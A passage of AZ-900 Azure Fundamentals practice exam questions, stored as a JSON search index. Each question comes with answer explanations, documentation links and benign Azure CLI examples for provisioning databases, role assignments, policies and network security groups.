        Explanation: Azure Pricing Calculator lets you attempt to calculate your future bill based on resources you select and your estimates of usage. See:\u00a0https://azure.microsoft.com/en-us/pricing/calculator/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-is-the-name-of-azures-hosted-sql-database-service","title":"Question 35:\u00a0What is the name of Azure's hosted SQL database service?","text":"
        • SQL Server in a VM
        • Table Storage
        • Cosmos DB
        • Azure SQL Database

        Explanation: SQL Database is a SQL Server compatible option in Azure, a database as a service. See:\u00a0https://docs.microsoft.com/en-us/azure/sql-database/sql-database-technical-overview
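
        A hedged sketch of provisioning the service with the Azure CLI; the server name, credentials, and service tier are placeholders:

        ```bash
        # Create a logical SQL server, then a database-as-a-service on it
        az sql server create \
          --resource-group my-rg \
          --name my-sql-server \
          --location eastus \
          --admin-user sqladmin \
          --admin-password "REPLACE_WITH_STRONG_PASSWORD"

        az sql db create \
          --resource-group my-rg \
          --server my-sql-server \
          --name appdb \
          --service-objective S0
        ```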

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-true-or-false-you-cannot-have-more-than-one-azure-subscription-per-company","title":"Question 36:\u00a0True or false: You cannot have more than one Azure subscription per company","text":"
        • TRUE
        • FALSE

        Explanation: You can have multiple subscriptions, as a way to separate out resources between billing units, business groups, or for any reason you wish. See:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/decision-guides/subscriptions/
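
        For illustration, switching between multiple subscriptions from the Azure CLI; the subscription name is a placeholder:

        ```bash
        # Show every subscription the signed-in account can access
        az account list --output table

        # Make one of them the active subscription for subsequent commands
        az account set --subscription "Dev-Team-Subscription"
        ```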

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-can-you-give-someone-else-access-to-your-azure-subscription-without-giving-them-your-user-name-and-password","title":"Question 37:\u00a0Can you give someone else access to your Azure subscription without giving them your user name and password?","text":"
        • YES
        • NO

        Explanation: Yes, anyone can create their own Azure account and you can give them access to your subscription with granular control as to permissions. See:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/overview
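
        A minimal sketch of such a grant using role-based access control from the Azure CLI; the user, role, and scope are placeholders:

        ```bash
        # Give another account read-only access to a single resource group,
        # without ever sharing your own credentials
        az role assignment create \
          --assignee someone@example.com \
          --role "Reader" \
          --scope "/subscriptions/<subscription-id>/resourceGroups/my-rg"
        ```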

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-true-or-false-you-can-create-your-own-policies-if-built-in-azure-policy-is-not-sufficient-to-your-needs","title":"Question 38:\u00a0True or false: you can create your own policies if built-in Azure Policy is not sufficient to your needs","text":"
        • FALSE
        • TRUE

        Explanation: True, you can create custom policies using JSON. See:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/tutorials/create-custom-policy-definition
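
        A hedged sketch of registering a custom definition with the Azure CLI; the rule below (deny resources outside two regions) is illustrative only:

        ```bash
        # Register a minimal custom policy definition from an inline JSON rule
        az policy definition create \
          --name "allowed-locations-custom" \
          --display-name "Allowed locations (custom)" \
          --mode All \
          --rules '{
            "if": { "field": "location", "notIn": ["eastus", "westeurope"] },
            "then": { "effect": "deny" }
          }'
        ```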

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-in-the-context-of-azures-service-level-agreement-sla-for-virtual-machines-which-of-the-following-deployment-strategies-would-offer-the-highest-level-of-availability","title":"Question 39:\u00a0In the context of Azure's Service Level Agreement (SLA) for virtual machines, which of the following deployment strategies would offer the highest level of availability?","text":"
        • Deploying two or more virtual machines across different availability zones within the same region.
        • Deploying two or more virtual machines within the same data center.
        • Deploying two or more virtual machines within an availability set.
        • Deploying a single virtual machine.

        Explanation: The correct answer is \"Deploying two or more virtual machines across different availability zones within the same region\".

        Service Level Agreement (SLA) is a commitment by a service provider on the level of service - like uptime, performance, or other key metrics - that users can expect. Azure provides an SLA for various services, including Virtual Machines. A single VM, even with premium storage, provides a lesser SLA compared to VMs deployed in an Availability Set or across Availability Zones. While using an Availability Set (two or more VMs in the same datacenter but across fault and update domains) provides a higher SLA than a single VM, the highest SLA is provided when two or more VMs are deployed across Availability Zones in the same region. Availability Zones are unique physical locations within a region. Each zone is made up of one or more datacenters equipped with independent power, cooling, and networking. They are set up to be an isolation boundary - if one zone goes down, the other continues working. This distribution of VMs across zones provides high availability and resiliency, hence offering the highest SLA. See:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-basic-way-of-protecting-an-azure-virtual-network-subnet","title":"Question 40: What is the basic way of protecting an Azure Virtual Network subnet?","text":"
        • Network Security Group
        • Azure DDoS Standard protection
        • Azure Firewall
        • Application Gateway with WAF

        Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations, and ports are allowed to travel through from outside the virtual network to inside the virtual network. See:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview
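
        A minimal sketch of this with the Azure CLI; the resource names and the allowed port are placeholders:

        ```bash
        # Create an NSG and allow inbound HTTPS only
        az network nsg create --resource-group my-rg --name web-nsg

        az network nsg rule create \
          --resource-group my-rg \
          --nsg-name web-nsg \
          --name allow-https \
          --priority 100 \
          --direction Inbound \
          --access Allow \
          --protocol Tcp \
          --destination-port-ranges 443

        # Attach the NSG to a subnet so the rules apply to everything in it
        az network vnet subnet update \
          --resource-group my-rg \
          --vnet-name my-vnet \
          --name web-subnet \
          --network-security-group web-nsg
        ```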

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-true-or-false-formal-support-is-not-included-in-private-preview-mode","title":"Question 41:\u00a0True or false: Formal support is not included in private preview mode.","text":"
        • FALSE
        • TRUE

        Explanation: True. Preview features are not fully ready and this phase does not include formal support. See:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-true-or-false-azure-has-the-responsibility-to-manage-the-hardware-in-the-infrastructure-as-a-service-model","title":"Question 42:\u00a0True or False: Azure has the responsibility to manage the hardware in the Infrastructure as a Service model","text":"
        • TRUE
        • FALSE

        Explanation: The correct answer is TRUE. In an Infrastructure as a Service (IaaS) model, the cloud service provider, in this case Microsoft Azure, is responsible for managing the underlying physical hardware. This includes servers, storage, networking hardware, and the virtualization layer. Azure ensures that these resources are available and maintained, providing capabilities like automated backup, disaster recovery, and scaling. The customer, on the other hand, is responsible for managing the software components of the service, including the operating system, middleware, runtime, data, and applications. This arrangement allows customers to focus on their core business and application development without worrying about the physical infrastructure's procurement, management, and maintenance. It's important to remember that the division of responsibilities may change in other service models like Platform as a Service (PaaS) or Software as a Service (SaaS), where the cloud service provider manages more layers of the technology stack. But for IaaS, the provider indeed manages the hardware, making the statement TRUE. See:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-is-single-sign-on","title":"Question 43: What is Single Sign-On?","text":"
        • When you sign in to an application, it remembers who you are the next time you go there.
        • The ability to use an existing user id and password to sign in to other applications, without having to create and memorize a new one.
        • When an application outsources (federates) its identity service to a third-party platform

        Explanation: Single Sign-On - the ability to use the same user id and password to log into every application that your company has; enabled by Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-single-sign-on

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-an-it-administrator-has-the-requirement-to-control-access-to-a-specific-app-resource-using-multi-factor-authentication-what-azure-service-satisfies-this-requirement","title":"Question 44:\u00a0An IT administrator has the requirement to control access to a specific app resource using multi-factor authentication. What Azure service satisfies this requirement?","text":"
        • Azure Authentication
        • Azure Function
        • Azure AD
        • Azure Authorization

        Explanation: You can use Azure AD to control access to your apps and your app resources, based on your business requirements. In addition, you can use Azure AD to require multi-factor authentication when accessing important organizational resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-main-management-tool-used-for-managing-azure-resources-with-a-graphical-user-interface","title":"Question 45:\u00a0What is the MAIN management tool used for managing Azure resources with a graphical user interface?","text":"
        • Remote Desktop Protocol (RDP)
        • PowerShell
        • Azure Storage Explorer
        • Azure Portal

        Explanation: Azure Portal is the website used to manage your resources in Azure. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-portal/azure-portal-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-what-is-the-default-amount-of-credits-that-you-are-given-when-you-first-create-an-azure-free-account","title":"Question 46:\u00a0What is the default amount of credits that you are given when you first create an Azure Free account?","text":"
        • The default is US$200
        • You can create 1 Linux VM, 1 Windows VM, and a number of other free services for the first year.
        • You are given $50 per month, for one year towards Azure services
        • Azure does not give you any free credits when you create a free account

        Explanation: There are some other benefits to a free account, but you get US$200 to spend in the first month. See:\u00a0https://azure.microsoft.com/free

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-azure-services-can-go-through-several-phases-in-a-service-lifecycle-what-are-the-three-phases-called","title":"Question 47:\u00a0Azure Services can go through several phases in a Service Lifecycle. What are the three phases called?","text":"
        • Preview Phase, General Availability Phase, and Unpublished
        • Private Preview, Public Preview, and General Availability
        • Development phase, QA phase, and Live phase
        • Announced, Coming Soon, and Live

        Explanation: Private Preview, Public Preview, and General Availability.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-is-azures-preferred-identityauthentication-service","title":"Question 48:\u00a0What is Azure's preferred Identity/authentication service?","text":"
        • Network Security Group
        • Facebook Connect
        • Live Connect
        • Azure Active Directory

        Explanation: Azure Active Directory (Azure AD) - Microsoft\u2019s preferred Identity as a Service solution. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-tool-within-azure-helps-you-to-track-your-compliance-with-various-international-standards-and-government-laws","title":"Question 49:\u00a0Which tool within Azure helps you to track your compliance with various international standards and government laws?","text":"
        • Microsoft Privacy Statement
        • Service Trust Portal
        • Compliance Manager
        • Azure Government Services

        Explanation: Compliance Manager will track your own compliance with various standards and laws. See:\u00a0https://techcommunity.microsoft.com/t5/security-privacy-and-compliance/announcing-compliance-manager-general-availability/ba-p/161922

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-is-a-feature-of-the-cool-access-tier-for-azure-storage","title":"Question 50:\u00a0Which of the following is a feature of the cool access tier for Azure Storage?","text":"
        • Much cheaper to store your files than the hot access tier
        • Most expensive option when it comes to bandwidth cost to access your files
        • Cheapest option when it comes to bandwidth costs to access your files
        • Significant delays in accessing your data, up to several hours

        Explanation: Cool access tier offers cost savings when you expect to store your files and not need to access them often. See:\u00a0https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-storage-tiers?tabs=azure-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-2","title":"Test 2","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-of-the-following-scenarios-would-azure-policy-be-a-recommended-method-for-enforcement","title":"Question 1: Which of the following scenarios would Azure Policy be a recommended method for enforcement?","text":"
        • Allow only specific roles of users to have access to a resource group
        • Add an additional prompt when creating a resource without a specific tag, asking the user whether they are sure they want to continue
        • Prevent certain Azure Virtual Machine instance types from being used in a resource group
        • Require a virtual machine to always update to the latest security patches

        Explanation: Azure Policy can add restrictions on storage account SKUs, virtual machine instance types, and rules relating to tagging of resources and groups. It cannot prompt a user to ask them if they are sure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview
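
        As a hedged sketch of enforcing the VM-size restriction, this assigns the built-in definition named 'Allowed virtual machine size SKUs'; the scope, the SKU list, and the listOfAllowedSKUs parameter name are assumptions worth verifying with az policy definition show:

        ```bash
        # Look up the built-in definition by display name
        def_name=$(az policy definition list \
          --query "[?displayName=='Allowed virtual machine size SKUs'].name" -o tsv)

        # Assign it to a resource group, allowing only two VM sizes
        az policy assignment create \
          --name "restrict-vm-sizes" \
          --policy "$def_name" \
          --scope "/subscriptions/<subscription-id>/resourceGroups/my-rg" \
          --params '{"listOfAllowedSKUs":{"value":["Standard_B2s","Standard_D2s_v5"]}}'
        ```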

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-select-the-ways-to-increase-the-security-of-a-traditional-user-id-and-password-system","title":"Question 2:\u00a0Select the way(s) to increase the security of a traditional user id and password system?","text":"
        • Use multi-factor authentication which requires an additional device (something you have) to verify identity.
        • Require longer and more complex passwords.
        • Do not allow users to log into an application except using a company registered device.
        • Require users to change their passwords more frequently.

        Explanation: All of these are ways to increase the security on an account. For more info: - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-password-ban-bad - https://docs.microsoft.com/en-us/azure/active-directory-domain-services/password-policy - https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-sspr-policy

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-besides-azure-service-health-where-else-can-you-find-out-any-issues-that-affect-the-azure-global-network-that-affect-you","title":"Question 3:\u00a0Besides Azure Service Health, where else can you find out any issues that affect the Azure global network that affect you?","text":"
        • Install the Azure app on your phone
        • Azure will email you
        • Azure Updates Blog
        • Each Virtual Machine has a Resource Health blade

        Explanation: Each Virtual Machine has a Resource Health blade. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/resource-health-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-would-be-a-good-reason-to-have-multiple-azure-subscriptions","title":"Question 4:\u00a0What would be a good reason to have multiple Azure subscriptions?","text":"
        • There is one person/credit card paying for resources, and only one person who logs into Azure to manage the resources, but you want to be able to know which resources are used for which client project.
        • There is one person/credit card paying for resources, but many people who have accounts in Azure, and you need to separate out resources between clients so that there is absolutely no chance of resources being exposed between them.

        Explanation: Having multiple subscriptions can technically be done for any reason, but it only makes sense if you have to separate billing directly, or have actual clients logging into the Portal to manage their resources. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-which-of-the-following-is-not-an-example-of-infrastructure-as-a-service","title":"Question 5:\u00a0Which of the following is not an example of Infrastructure as a Service?","text":"
        • Azure SQL Database
        • SQL Server in a VM
        • Virtual Machine
        • Virtual Machine Scale Sets
        • Virtual Network

        Explanation: With Azure SQL Database, the infrastructure is not in your control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-which-of-the-following-is-not-a-feature-of-azure-functions","title":"Question 6:\u00a0Which of the following is not a feature of Azure Functions?","text":"
        • Designed for backend batch applications that are continuously running
        • Can trigger the function based off of Azure events such as a new file being saved to a storage account blob container
        • Can possibly cost you nothing as there is a generous free tier
        • Can edit the code right in the Azure Portal using a code editor

        Explanation: Functions are designed for short pieces of code that start and end quickly. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/
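
        For contrast with always-running batch servers, a consumption-plan function app sketch; the names are placeholders and the storage account is assumed to exist already:

        ```bash
        # Consumption plan: billed per execution, scales to zero when idle
        az functionapp create \
          --resource-group my-rg \
          --name my-func-app \
          --storage-account mystorageacct \
          --consumption-plan-location eastus \
          --os-type Linux \
          --runtime python \
          --functions-version 4
        ```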

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-within-the-context-of-privacy-and-compliance-what-does-the-acronym-iso-stand-for-in-english","title":"Question 7: Within the context of privacy and compliance, what does the acronym ISO stand for, in English?","text":"
        • Information Systems Officer
        • Instead of
        • International Organization for Standardization
        • Intelligence and Security Office

        Explanation: ISO is a standards body, International Organization for Standardization. For more info:\u00a0https://www.iso.org/about-us.html

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-is-the-minimum-charge-for-having-an-azure-account-each-month-even-if-you-dont-use-any-resources","title":"Question 8:\u00a0What is the minimum charge for having an Azure Account each month, even if you don't use any resources?","text":"
        • $0
        • $200
        • $1
        • Negotiated with your enterprise manager

        Explanation: An Azure account can cost nothing if you don't use any resources or only use free resources. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-what-is-a-benefit-of-economies-of-scale","title":"Question 9: What is a benefit of economies of scale?","text":"
        • Prices of cloud servers and services are always going down. It'll be cheaper next year than it is this year.
        • Big companies don't need to make a profit on every sale
        • Big companies don't need to make a profit on the first product they sell you, because they will make a profit on the second
        • The more you buy of something, the cheaper it is for you

        Explanation: Economies of Scale - the more of an item that you buy, the cheaper it is per unit. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3b-economies-of-scale

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-application-gateway-contains-what-additional-optional-security-feature-over-a-regular-load-balancer","title":"Question 10:\u00a0Application Gateway contains what additional optional security feature over a regular Load Balancer?","text":"
        • Azure AD Advanced Information Protection
        • Multi-Factor Authentication
        • Web Application Firewall (WAF)
        • Advanced DDoS Protection

        Explanation: Application Gateway also comes with an optional Web Application Firewall (or WAF) as a security benefit. For more info:\u00a0https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/ag-overview
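
        A hedged sketch of selecting the WAF tier at creation time; the surrounding network resources are assumed to exist and all names are placeholders:

        ```bash
        # The WAF_v2 SKU is what turns on the Web Application Firewall tier
        az network application-gateway create \
          --resource-group my-rg \
          --name my-app-gw \
          --sku WAF_v2 \
          --capacity 2 \
          --vnet-name my-vnet \
          --subnet appgw-subnet \
          --public-ip-address appgw-pip \
          --priority 100
        ```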

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-approximately-how-many-regions-does-azure-have-around-the-world","title":"Question 11:\u00a0Approximately how many regions does Azure have around the world?","text":"
        • 60+
        • 25
        • 10
        • 40

        Explanation: There are 60+ Azure regions currently, in 10+ geographies. For more info:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-region

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-does-it-mean-if-a-service-is-in-public-preview-mode","title":"Question 12: What does it mean if a service is in Public Preview mode?","text":"
        • Anyone can use the service but it must not be for production use
        • Anyone can use the service for any reason
        • The service is generally available for use, and Microsoft will provide support for it
        • You have to apply to get selected in order to use that service

        Explanation: Public Preview is for anyone to use, but it is not supported nor guaranteed to continue to be available. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-cloud-computing-models-requires-the-highest-level-of-involvement-in-maintaining-the-operating-system-and-file-system-by-the-customer","title":"Question 13:\u00a0Which of the following cloud computing models requires the highest level of involvement in maintaining the operating system and file system by the customer?","text":"
        • IaaS
        • FaaS
        • PaaS
        • SaaS

        Explanation: IaaS or Infrastructure as a service requires you to keep your OS patched, close ports, and generally protect your own server. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-true-or-false-azure-cloud-shell-allows-access-to-the-bash-and-powershell-consoles-in-the-azure-portal","title":"Question 14:\u00a0True or false: Azure Cloud Shell allows access to the Bash and Powershell consoles in the Azure Portal","text":"
        • FALSE
        • TRUE

        Explanation: Cloud Shell - allows access to the Bash and Powershell consoles in the Azure Portal. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-shell/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-of-the-following-elements-is-considered-part-of-the-perimeter-layer-of-security","title":"Question 15:\u00a0Which of the following elements is considered part of the \"perimeter\" layer of security?","text":"
        • Separate servers into distinct subnets by role
        • Locks on the data center doors
        • Keep operating systems up to date with patches
        • Use a firewall

        Explanation: Firewall is part of the perimeter security. For more information on the layered approach to network security:\u00a0https://docs.microsoft.com/en-us/learn/modules/intro-to-security-in-azure/5-network-security

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-the-concept-of-paired-regions","title":"Question 16:\u00a0What is the concept of paired regions?","text":"
        • Azure employees in those regions sometimes go on picnics together.
        • Each region of the world has one other region, usually in a completely separate country and geography, where it makes the most sense to place your backups. Like East US 2 is paired with South Korea.
        • When you deploy your code to one region of the world, it is automatically deployed to the paired region as an emergency backup.
        • Each region in the world has at least one other region with which it shares an extremely high-speed connection, and where Azure coordinates its actions so that nothing brings both regions down at the same time.

        Explanation: Paired regions are usually in the same geo (not always) but are the most logical place to store backups because they have a high speed connection and Azure staggers the service updates to those regions. For more info:\u00a0https://docs.microsoft.com/en-us/azure/best-practices-availability-paired-regions
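
        As a rough illustration, recent Azure CLI versions expose pairing metadata, which can be listed like this (the query assumes the metadata.pairedRegion field is present in your CLI version's output):

        ```bash
        # Show each region alongside its pair, where one is published
        az account list-locations \
          --query "[?metadata.pairedRegion].{Region:name, PairedWith:metadata.pairedRegion[0].name}" \
          --output table
        ```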

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-makes-estimating-the-cost-of-an-unmanaged-storage-account-difficult","title":"Question 17:\u00a0What makes estimating the cost of an unmanaged storage account difficult?","text":"
        • There is no way to predict the amount of data in the account
        • The cost of storage changes frequently
        • You are charged for data leaving Azure, and it's difficult to predict that
        • You are charged for data coming into Azure, and it's difficult to predict that

        Explanation: There is a cost for egress (bandwidth out) and it's hard to estimate how many bytes will be counted leaving an Azure network. For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/storage/page-blobs/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-why-is-a-user-id-and-password-sometimes-not-enough-to-prove-someone-is-who-they-say-they-are","title":"Question 18:\u00a0Why is a user id and password sometimes not enough to prove someone is who they say they are?","text":"
        • User id and password can be used by anyone such as a co-worker, ex-employee or hacker half-way around the world
        • Some people might choose the same user id and password
        • Passwords must be encrypted before being stored
        • Passwords are usually easy to forget

        Explanation: A user id and password can be stolen, leaked, or simply guessed, and then used by someone else. For more information on other ways to prove self-identification such as Multi-Factor Authentication:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-tool-within-azure-is-comprised-of-azure-status-service-health-and-resource-health","title":"Question 19:\u00a0Which tool within Azure is comprised of : Azure Status, Service Health and Resource Health?","text":"
        • Azure Dashboard
        • Azure Monitor
        • Azure Service Health
        • Azure Advisor

        Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-is-a-good-example-of-a-hybrid-cloud","title":"Question 20:\u00a0Which of the following is a good example of a Hybrid cloud?","text":"
        • Your users are inside your corporate network but your applications and data are in the cloud.
        • Your code is a mobile app that runs on iOS and Android phones, but it uses a database in the cloud.
        • A server runs in your own environment, but places files in the cloud so that it can extend the amount of storage it has access to.
        • Technology that allows you to grow living tissue on top of an exoskeleton, making Terminators impossible to spot among humans.

        Explanation: Hybrid Cloud - A mixture between your own private networks and servers, and using the public cloud for some things. Typically used to take advantage of the unlimited, inexpensive growth benefits of the public cloud. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-hybrid-cloud-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-do-you-go-within-the-azure-portal-to-find-all-of-the-third-party-virtual-machine-and-other-offers","title":"Question 21:\u00a0Where do you go within the Azure Portal to find all of the third-party virtual machine and other offers?","text":"
        • Azure mobile app
        • Azure Marketplace
        • Choose an image when creating a VM
        • Bing

        Explanation: Azure Marketplace contains thousands of services you can rent within the cloud. For more info:\u00a0https://azuremarketplace.microsoft.com/en-us

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-is-the-new-data-privacy-and-information-protection-regulation-that-took-effect-across-europe-in-may-2018","title":"Question 22:\u00a0What is the new data privacy and information protection regulation that took effect across Europe in May 2018?","text":"
        • FedRAMP
        • GDPR
        • ISO 9001:2015
        • PCI DSS

        Explanation: The General Data Protection Regulation (GDPR) took effect in Europe in May 2018. For more info:\u00a0https://docs.microsoft.com/en-us/microsoft-365/compliance/gdpr?view=o365-worldwide

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-why-is-azure-app-services-considered-platform-as-a-service","title":"Question 23:\u00a0Why is Azure App Services considered Platform as a Service?","text":"
        • You can decide on what type of virtual machine it runs - A-series, or D-series, or even H-series
        • You are responsible for keeping the operating system up to date with the latest patches
        • Azure App Services is not PaaS, it's Software as a Service.
        • You give Azure the code and configuration, and you have no access to the underlying hardware

        Explanation: You give Azure the code and configuration, and you have no access to the underlying hardware. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-what-two-types-of-ddos-protection-services-does-azure-provide-select-two","title":"Question 24: What two types of DDoS protection services does Azure provide? Select two.","text":"
        • DDoS\u00a0Premium Protection
        • DDoS\u00a0Advanced Protection
        • DDoS Network Protection
        • DDoS IP Protection

        Explanation: Azure DDoS Protection offers two types of DDoS protection services:

        • Network Protection\u00a0protects against volumetric attacks that target the network infrastructure. This type of protection is available for all Azure resources that are deployed in a virtual network.

        • IP Protection\u00a0protects against volumetric and protocol-based attacks that target specific public IP addresses. This type of protection is available for public IP addresses that are not deployed in a virtual network.

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-what-types-of-files-can-a-content-delivery-network-speed-up-the-delivery-of","title":"Question 25:\u00a0What types of files can a Content Delivery Network speed up the delivery of?","text":"
        • PDFs
        • Videos
        • Images
        • JavaScript files

        Explanation: All of them. Any static file that doesn't change. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cdn/cdn-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-what-is-the-concept-of-big-data","title":"Question 26:\u00a0What is the concept of Big Data?","text":"
        • A set of Azure services that allow you to execute code in the cloud but don\u2019t require (or even allow) you to manage the underlying server
        • A form of artificial intelligence (AI) that allows systems to automatically learn and improve from experience without being explicitly programmed.
        • A small sensor or other device that constantly sends its status and other data to the cloud
        • An extremely large set of data that you want to ingest and do analysis on; traditional software like SQL Server cannot handle Big Data as efficiently as specialized products

        Explanation: Big Data - a set of open source (Apache Hadoop) products that can do analysis on millions and billions of rows of data; current tools like SQL Server are not good for this scale

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/architecture-styles/big-data

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-select-all-features-part-of-azure-ad","title":"Question 27:\u00a0Select all features part of Azure AD?","text":"
        • Device Management
        • Log Alert Rule
        • Single sign-on
        • Smart lockout
        • Custom banned password list

        Explanation: The Log Alert Rule is not a feature of Azure AD. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-in-which-us-state-is-the-east-us-2-region","title":"Question 28:\u00a0In which US state is the East US 2 region?","text":"
        • Iowa
        • Virginia
        • Texas
        • California

        Explanation: East US 2 is in the Eastern state of Virginia, close to Washington DC. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/data-residency/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-windows-servers-use-remote-desktop-protocol-rdp-in-order-for-administrators-to-get-access-to-manage-the-server-linux-servers-use-ssh-what-is-the-recommendation-for-ensuring-the-security-of-these-protocols","title":"Question 29:\u00a0Windows servers use \"remote desktop protocol\" (RDP) in order for administrators to get access to manage the server. Linux servers use SSH. What is the recommendation for ensuring the security of these protocols?","text":"
        • Disable RDP access using the Windows Services control panel admin tool
        • Ensure strong passwords on your Windows admin accounts
